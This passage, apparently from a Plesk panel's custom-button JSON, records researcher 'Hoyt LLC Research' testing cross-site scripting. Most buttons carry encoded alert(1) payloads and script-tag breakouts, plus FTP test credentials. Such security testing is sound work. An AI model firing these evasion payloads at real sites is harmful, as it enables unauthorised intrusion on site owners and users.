xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"47a92%2522%253baa99fdd1270?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-69915200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e27d6%2522%253b9ddf3b95647?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-6a0856c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3d5a5%2522%252dalert%25281%2529%252d%25225ca54b544?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-77ac57e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4d8c7%2522%252dalert%25281%2529%252d%25221949039db7c?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-78d38260-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"614b3%255c%2522%253be210f06fb27?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8205b240-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4f900%255c%2522%253b6cc1851587?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-839cbd60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-896a1760-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-8b4167a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c%253c%252fscript%253e92757840c8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8d69a6a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f%253c%252fscript%253ee4b7ce199c3?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8f4a7c60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%009f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-91112300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-935f7800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-947abba0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-96bd29c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12%253c%252fScRiPt%2520%253e2e0a3728b8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-982bbd80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5%253c%252fScRiPt%2520%253e05c4f3b01c2?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9a708d00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9bd0d880-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-9e075fc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"13e85%2527%253b2fac11d343e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-a326f560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2f63%2527%252dalert%25281%2529%252d%25278e70213d4f4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab68ba60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c75a4%255c%2527%253b6186c64b550?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b1b90000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b5843100-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463%253c%252fscript%253e490b561a81?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-b75b8140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b93eb860-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bb4cc840-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f%253c%252fScRiPt%2520%253e2cdf6c3b534?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd4ef140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bf2b0440-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"83b38%2522%253b79ac1f4c99d?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-df4b32e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"683d4%2522%252dalert%25281%2529%252d%25225babbed5232?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e2689f80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a881a%2522%253bcc41ad8a12?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e47910c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e1a57%255c%2522%253b30bc91affda?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e5e08060-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3336f%2522%252dalert%25281%2529%252d%25224d488d471d0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e7f35300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-e83f7f00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56%253c%252fscript%253ebca635fbfb?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e9a22be0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb17e3c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7764%255c%2522%253b55ff7405d87?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb4c4200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ec62c2e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-ed6d5ce0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564%253c%252fScRiPt%2520%253e32fe847420e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ed9a9700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4%253c%252fscript%253e060a7d1f2c0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeaeb680-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0040564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeea38e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-effbf700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ca12f%2527%253b35fe7f9ef49?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-f0fd0b80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f13fb200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7%253c%252fScRiPt%2520%253ec28bafc4b33?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f28a9120-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f4050bc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a812b%2527%252dalert%25281%2529%252d%25270d7822b344b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f40e9140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7d63%2527%253b2f26f55ca59?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-f7bf9320-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"8692e%255c%2527%253b0d203c8e729?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f9ba9800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b28c2%2527%252dalert%25281%2529%252d%252752a751e644d?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc6a8560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc909b60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e%253c%252fscript%253ecf16d55fc95?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fde50000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0088f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-ff1f3580-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"5b27d%255c%2527%253b1ce9a941be4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ff4a0e40-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0067b340-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0150fa00-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3%253c%252fScRiPt%2520%253e4a0c2054c2b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-01be7940-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7%253c%252fscript%253e351654a9214?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-028d90e0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%002b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-02f64d60-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-03cc8920-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0506bea0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8%253c%252fScRiPt%2520%253ec493568736e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0639d000-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0035df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-0771a420-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 